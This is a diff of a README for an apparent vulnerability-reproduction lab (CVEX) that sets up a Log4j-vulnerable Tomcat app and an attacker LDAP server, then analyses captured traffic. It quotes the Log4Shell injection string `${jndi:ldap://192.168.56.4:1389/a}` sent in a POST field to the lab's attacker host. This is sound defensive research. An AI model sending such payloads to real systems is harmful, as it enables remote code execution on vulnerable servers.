zywang624/CVEX/README.md

 Ansible playbook `ubuntu1.yml` installs an Apache Tomcat based web application, vulnerable to the Log4j attack.
 Ansible playbook `ubuntu2.yml` installs a fake LDAP server and a web server that is hosting the payload.

-Section "Execution of CVE-0000-00000" describes the execution process in details, therefore we will omit it here.
-Instead, let's focus on analysis of logs produced by CVEX.
-In our logs the IP address of ubuntu1 is 192.168.56.3, the IP address of ubuntu2 is 192.168.56.4.
+Since the execution process has been already described in the section `Execution of CVE-0000-00000`, let's focus on analysis of logs produced by CVEX.
+In our logs the IP address of `ubuntu1` is `192.168.56.3`, the IP address of `ubuntu2` is `192.168.56.4`.

 To inspect the PCAP file, run tcpdump:
 ```
 ~/CVEX$ tcpdump -qns 0 -A -r out/router_raw.pcap
 ```

-The attacker 192.168.56.4 (ubuntu2) issues an HTTP POST request to Apache Tomcat running on 192.168.56.3 (ubuntu1).
+The attacker `192.168.56.4` (`ubuntu2`) issues an HTTP POST request to Apache Tomcat running on `192.168.56.3` (`ubuntu1`).
 The POST request contains malicious data `${jndi:ldap://192.168.56.4:1389/a}` in the `uname` field.
 The data is URL-encoded:
 ```
 15:34:03.050477 IP 192.168.56.4.36880 > 192.168.56.3.8080: tcp 219
 E....t@.@.....8...8.....:.u................